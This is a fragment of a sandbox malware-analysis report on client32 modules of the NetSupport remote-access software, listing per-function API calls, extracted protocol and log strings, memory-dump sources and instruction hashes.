                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_free$EnterLeave__wcstoui64_strncatctl_getsessionstrtoxl
                                                                                                                                        • String ID: 305090$CLIENT_NAME=%s$CMD=CONNECT_REPLY$CONNECTION_ID$CONNECTION_ID=%u$CONTROL_ADDR$CONTROL_NAME$NC_$RESULT=%d
                                                                                                                                        • API String ID: 1400833098-100571553
                                                                                                                                        • Opcode ID: d1f00e011837c8e481256ab3ced6f69a862a9de0a2d4243254c2a85d68bba493
                                                                                                                                        • Instruction ID: d5914987396e5cfc32c0599530a0c238a0cde10343390126a99039b40c877798
                                                                                                                                        • Opcode Fuzzy Hash: d1f00e011837c8e481256ab3ced6f69a862a9de0a2d4243254c2a85d68bba493
                                                                                                                                        • Instruction Fuzzy Hash: DA717EB5D04218AFDB10DFE8DC80BAEBBF8AF59358F94842DE415E7200E7749505CBA5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • _memset.LIBCMT ref: 68901816
                                                                                                                                        • __wcstoui64.LIBCMT ref: 68901B14
                                                                                                                                          • Part of subcall function 689149AE: strtoxl.LIBCMT ref: 689149D0
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901C12
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 68901C62
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901C95
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 68901CAC
                                                                                                                                        • std::exception::exception.LIBCMT ref: 68901CDA
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68901CF5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave_memset$Exception@8Throw__wcstoui64_mallocstd::exception::exceptionstrtoxlwsprintf
                                                                                                                                        • String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TMG$TXT$UID$b
                                                                                                                                        • API String ID: 29704495-3942920506
                                                                                                                                        • Opcode ID: ffb1e0a4f500c11d9bbecb0acc472e7ff429a49ae830fb8a686b6a2430f91843
                                                                                                                                        • Instruction ID: 5958403a292c7da9e90e1d0e13ddcf0cfdc03037f5d7f9d842c49a6f6b604359
                                                                                                                                        • Opcode Fuzzy Hash: ffb1e0a4f500c11d9bbecb0acc472e7ff429a49ae830fb8a686b6a2430f91843
                                                                                                                                        • Instruction Fuzzy Hash: F2C197B5D042296FDF20DFA89C41ABF76B89F2520CF84017ED516E6201F731CB99CA96
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 68904762
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 6890477B
                                                                                                                                        • _free.LIBCMT ref: 68904810
                                                                                                                                        • GetTickCount.KERNEL32 ref: 6890481E
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68904830
                                                                                                                                        • Sleep.KERNEL32(00000014), ref: 6890483E
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 68904852
                                                                                                                                        • _free.LIBCMT ref: 6890487E
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 68904898
                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 689048B4
                                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 689048C4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CountEnterErrorLastLeaveTick_free$Sleep
                                                                                                                                        • String ID: APPTYPE=%d$CMD=LICENSEINFO$GSK=%s$Gateway_Gsk
                                                                                                                                        • API String ID: 1027280825-3838607062
                                                                                                                                        • Opcode ID: 8407279ea64c65b3e42e31062875a5dbd76129e0138a4793897f92a9d40b9310
                                                                                                                                        • Instruction ID: 1049e8ee8e25fd6728b914aa01fab09d742a76a198422ea10c2f78bbb7da74e2
                                                                                                                                        • Opcode Fuzzy Hash: 8407279ea64c65b3e42e31062875a5dbd76129e0138a4793897f92a9d40b9310
                                                                                                                                        • Instruction Fuzzy Hash: DB51B076944219AFDB20DFA8CC45FAF77B8EF95348F804918E94597240EB31E905CBA1
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$Xinvalid_argumentstd::_
                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                        • API String ID: 1771113911-4289949731
                                                                                                                                        • Opcode ID: b8feaf20e23ccf89f4431d1a2b735e7e5b61d951459d6b995b62dadb511fba2e
                                                                                                                                        • Instruction ID: c73f9094dd5c4c89b122d99cefd1aa50b73eade2501b6d4cff9a7a611e0538c3
                                                                                                                                        • Opcode Fuzzy Hash: b8feaf20e23ccf89f4431d1a2b735e7e5b61d951459d6b995b62dadb511fba2e
                                                                                                                                        • Instruction Fuzzy Hash: B8B18F717140489BDB28CF1CDC90A5E73A6EFA57847944D28F892CB781CBB4E852CBA1
                                                                                                                                        APIs
                                                                                                                                        • InitializeCriticalSection.KERNEL32(0000001C), ref: 1112117E
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 111211B5
                                                                                                                                        • GlobalAddAtomA.KERNEL32(NSMRemote32), ref: 111213AA
                                                                                                                                        • GetVersionExA.KERNEL32(?,?,?,00000000), ref: 111213D3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AtomCriticalCurrentGlobalInitializeSectionThreadVersion
                                                                                                                                        • String ID: IgnoreScrape$LegacyScrape$LimitColorbits$MaxLag$NSMRemote32$ScaleToFitMode$ScaleToFitTilingFactor$Show$ShowBigBlits$View
                                                                                                                                        • API String ID: 3042533059-2538903574
                                                                                                                                        • Opcode ID: fbf171a93a064c4978fa1075158420c735f9f0bd711a0402550495a255e203ec
                                                                                                                                        • Instruction ID: eb6122d518b0ca6329e0510ddbb3154fc8dc97cf8e450e1036336aff3cebea76
                                                                                                                                        • Opcode Fuzzy Hash: fbf171a93a064c4978fa1075158420c735f9f0bd711a0402550495a255e203ec
                                                                                                                                        • Instruction Fuzzy Hash: 59B18CB8A00705AFD760CF65CD84B9BFBF5AF85704F20856EE55A9B280DB30A940CF51
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • getpeername.WSOCK32(?,?,?,68930E3D,?,?,?,?), ref: 68902198
                                                                                                                                        • htons.WSOCK32(?,?,?,?,?,68930E3D,?,?,?,?), ref: 689021A9
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,68930E3D,?,?,?,?), ref: 689021D9
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?), ref: 6890220C
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,68930E3D,?,?,?,?), ref: 68902217
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?), ref: 68902227
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6890226B
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68902286
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$Exception@8Throw_malloc_memsetgetpeernamehtonsstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: FNAME$FSIZE$LINK$LWT$RESULT$SUB
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1110313E
                                                                                                                                        • EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1110314D
                                                                                                                                        • GetTickCount.KERNEL32 ref: 111031A0
                                                                                                                                        • LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9
                                                                                                                                        • GetTickCount.KERNEL32 ref: 111031DA
                                                                                                                                        • LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031E3
                                                                                                                                        • EnterCriticalSection.KERNEL32(111EC5C4), ref: 1110320C
                                                                                                                                        • LeaveCriticalSection.KERNEL32(111EC5C4,00000000,?,00000000), ref: 111032D3
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                          • Part of subcall function 110EEA50: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11103277,?), ref: 110EEA7B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_memsetwsprintf
                                                                                                                                        • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$Library$AddressFreeLoadProcwsprintf
                                                                                                                                        • String ID: RAS$%02x%02x%02x%02x%02x%02x$* $3$DEST$Netbios$netapi32.dll
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F50E0: GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,nextfileindex,00000001,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 688F5131
                                                                                                                                          • Part of subcall function 688F50E0: wsprintfA.USER32 ref: 688F514A
                                                                                                                                          • Part of subcall function 688F50E0: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 688F5168
                                                                                                                                          • Part of subcall function 688F50E0: GetFileSize.KERNEL32(00000000,00000000), ref: 688F5172
                                                                                                                                          • Part of subcall function 688F50E0: GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,maxfilesize,000003E8,C:\Users\user\AppData\Roaming\Cisco\Support\pci.ini), ref: 688F5191
                                                                                                                                          • Part of subcall function 688F50E0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 688F51B2
                                                                                                                                          • Part of subcall function 688F50E0: FlushFileBuffers.KERNEL32(00000000,?,688F9B16,00000001), ref: 688F51D8
                                                                                                                                          • Part of subcall function 688F50E0: CloseHandle.KERNEL32(00000000), ref: 688F51E4
                                                                                                                                          • Part of subcall function 688F50E0: wsprintfA.USER32 ref: 688F5225
                                                                                                                                          • Part of subcall function 688F50E0: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 688F5243
                                                                                                                                        • GetDateFormatA.KERNEL32(00000400,00000000,00000000,dd-MMM-yy,?,00000020,?,?,?), ref: 688F52E8
                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 688F52F2
                                                                                                                                        • wsprintfA.USER32 ref: 688F5315
                                                                                                                                        • _memset.LIBCMT ref: 688F5329
                                                                                                                                        • wsprintfA.USER32 ref: 688F5366
                                                                                                                                        • _memmove.LIBCMT ref: 688F537B
                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 688F53CE
                                                                                                                                        • GetLastError.KERNEL32 ref: 688F53F5
                                                                                                                                        Strings
                                                                                                                                        • !>>, xrefs: 688F5380
                                                                                                                                        • --------------------------------------------------------------------[#%u] %hs %hs %s Length: %d (%s)<<!, xrefs: 688F5360
                                                                                                                                        • TraceBuf - WriteFile failed (%d), xrefs: 688F53FC
                                                                                                                                        • OUT, xrefs: 688F5335, 688F5348
                                                                                                                                        • dd-MMM-yy, xrefs: 688F52DA
                                                                                                                                        • %02d:%02d:%02d.%03d, xrefs: 688F530F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$wsprintf$CreatePrivateProfile$BuffersCloseDateErrorFlushFormatHandleLastLocalPointerSizeTimeWrite_memmove_memset
                                                                                                                                        • String ID: !>>$%02d:%02d:%02d.%03d$--------------------------------------------------------------------[#%u] %hs %hs %s Length: %d (%s)<<!$OUT$TraceBuf - WriteFile failed (%d)$dd-MMM-yy
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • _memset.LIBCMT ref: 68900FAD
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901293
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 689012E3
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901316
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 6890132D
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6890135B
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68901376
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave_memset$Exception@8Throw_mallocstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TXT$UID$b
                                                                                                                                        • API String ID: 275297366-914382535
                                                                                                                                        • Opcode ID: a5a294adbd8004396a39974843de7c165da1a6090a80b73a65300481d719b7a0
                                                                                                                                        • Instruction ID: 77ac8155906e829c091e411792d0a4518338b3829c3c043e77d2f59d68a523c0
                                                                                                                                        • Opcode Fuzzy Hash: a5a294adbd8004396a39974843de7c165da1a6090a80b73a65300481d719b7a0
                                                                                                                                        • Instruction Fuzzy Hash: E09153B5D042696FDF20DFA89C41AFE76B4AF15308F80057ED55AE6201F731CA48CB96
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                        • _free.LIBCMT ref: 688FE569
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FE59B
                                                                                                                                          • Part of subcall function 688F7090: _free.LIBCMT ref: 688F709E
                                                                                                                                        • _free.LIBCMT ref: 688FE5C9
                                                                                                                                        • _free.LIBCMT ref: 688FE5FB
                                                                                                                                        • __strdup.LIBCMT ref: 688FE665
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__strdup__vswprintf_malloc
                                                                                                                                        • String ID: CMD=PUBLISHSERVICE$CSPEC=%s$MODE=%s$NAME=%s$PublishService failed, err=%d$TYPE=%s$publish$revoke
                                                                                                                                        • API String ID: 1683320226-3494810577
                                                                                                                                        • Opcode ID: 40a9dad6a959eaf470b682f511d6fd4ed7d5fba0de43299d9fe17bfd0dea3b3b
                                                                                                                                        • Instruction ID: 925dc48b18f6f2e981f3b0e7ca29f862eafd7e035fc01d4f1404db08c0725c5a
                                                                                                                                        • Opcode Fuzzy Hash: 40a9dad6a959eaf470b682f511d6fd4ed7d5fba0de43299d9fe17bfd0dea3b3b
                                                                                                                                        • Instruction Fuzzy Hash: AA51B9BAD00249AFDB10DFA8DC809BF77B8EF94258B80893DE52597600E735F546C7A1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                        • LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000), ref: 110271C0
                                                                                                                                        • LoadIconA.USER32(00000000,00007D0B), ref: 110271D5
                                                                                                                                        • GetSystemMetrics.USER32(00000032), ref: 110271EE
                                                                                                                                        • GetSystemMetrics.USER32(00000031), ref: 110271F3
                                                                                                                                        • LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027203
                                                                                                                                        • LoadIconA.USER32(11000000,00000491), ref: 1102721B
                                                                                                                                        • GetSystemMetrics.USER32(00000032), ref: 1102722A
                                                                                                                                        • GetSystemMetrics.USER32(00000031), ref: 1102722F
                                                                                                                                        • LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 11027240
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
                                                                                                                                        • String ID: AdminUserAcknowledge$PCIRES$_License$product
                                                                                                                                        • API String ID: 1946015-1270847556
                                                                                                                                        • Opcode ID: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
                                                                                                                                        • Instruction ID: 7d40fe3dfb7a436b35654b91f1e6e13152f39ea3f8258807fefd6660e2433123
                                                                                                                                        • Opcode Fuzzy Hash: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
                                                                                                                                        • Instruction Fuzzy Hash: 00513775F40B176BEB11CAA48C81F6FB6AD9F55708F504025FE05E7281EB70E904C7A2
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 68904575
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 6890458A
                                                                                                                                        • GetTickCount.KERNEL32 ref: 6890461C
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68904627
                                                                                                                                        • Sleep.KERNEL32(00000014), ref: 6890463E
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 68904661
                                                                                                                                          • Part of subcall function 688F63C0: EnterCriticalSection.KERNEL32(6893B898,00000000,?,00000000,?,688FD77B,00000000), ref: 688F63E8
                                                                                                                                          • Part of subcall function 688F63C0: InterlockedDecrement.KERNEL32(-0003F3B7), ref: 688F63FA
                                                                                                                                          • Part of subcall function 688F63C0: EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,688FD77B,00000000), ref: 688F6412
                                                                                                                                          • Part of subcall function 688F63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F643B
                                                                                                                                          • Part of subcall function 688F63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F646F
                                                                                                                                          • Part of subcall function 688F63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F64A3
                                                                                                                                          • Part of subcall function 688F63C0: _memset.LIBCMT ref: 688F65C8
                                                                                                                                          • Part of subcall function 688F63C0: LeaveCriticalSection.KERNEL32(?,?,688FD77B,00000000), ref: 688F65D7
                                                                                                                                          • Part of subcall function 688F63C0: LeaveCriticalSection.KERNEL32(6893B898,?,00000000,?,688FD77B,00000000), ref: 688F65F2
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 6890469A
                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 689046A4
                                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 689046C5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$AddressProc$CountErrorLastTick$DecrementInterlockedSleep_memset
                                                                                                                                        • String ID: CMD=REMOVEDOMAIN$GSK=********$GUID=%s
                                                                                                                                        • API String ID: 3052827841-3462777587
                                                                                                                                        • Opcode ID: 0c76976de0cb6e94d9ccf53ba804d4d43b265439700e0b9f56fe77f3dc2610dd
                                                                                                                                        • Instruction ID: 3504d137c8492c16e337ff30d037f1c9a13c357d50deb84ca110bc1606c76887
                                                                                                                                        • Opcode Fuzzy Hash: 0c76976de0cb6e94d9ccf53ba804d4d43b265439700e0b9f56fe77f3dc2610dd
                                                                                                                                        • Instruction Fuzzy Hash: B1517175A08319EFCB20DFA8C884AAEB7B9EB44309F40452DE605D7240E771DA44CBA1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907BE0: _memset.LIBCMT ref: 68907BFF
                                                                                                                                          • Part of subcall function 68907BE0: _strncpy.LIBCMT ref: 68907C0B
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688F9EF8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcstoui64_memset_strncpy
                                                                                                                                        • String ID: 1.0$CMPI$FAILED_REASON$Gateway rejected client connection because licence was exceeded.$Gateway rejected client connection because security check failed.$MAC$MAXPACKET$PROTOCOL_VER$RESULT$SERVER_VERSION$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$strlen(p) == 12
                                                                                                                                        • API String ID: 2670788892-1257448691
                                                                                                                                        • Opcode ID: 3de22defb18497ef8bba7b0525a572efa4741872c8f9cecd3dc98cab1ee0f515
                                                                                                                                        • Instruction ID: 5fa6217f6458e18b0f3da54bad4ffb6238a28061f5b7d035a87f3059bb7dc976
                                                                                                                                        • Opcode Fuzzy Hash: 3de22defb18497ef8bba7b0525a572efa4741872c8f9cecd3dc98cab1ee0f515
                                                                                                                                        • Instruction Fuzzy Hash: DE4129A9D086227BEF209B78DC01B7F35A49F52399FC40438F815D6641F766D612C7E2
                                                                                                                                        APIs
                                                                                                                                        • UnDecorator::getBasicDataType.LIBCMT ref: 6892C388
                                                                                                                                        • DName::operator=.LIBCMT ref: 6892C39C
                                                                                                                                        • DName::operator+=.LIBCMT ref: 6892C3AA
                                                                                                                                        • UnDecorator::getPtrRefType.LIBCMT ref: 6892C3D6
                                                                                                                                        • UnDecorator::getDataIndirectType.LIBCMT ref: 6892C453
                                                                                                                                        • UnDecorator::getBasicDataType.LIBCMT ref: 6892C45C
                                                                                                                                        • operator+.LIBCMT ref: 6892C4EF
                                                                                                                                        Strings
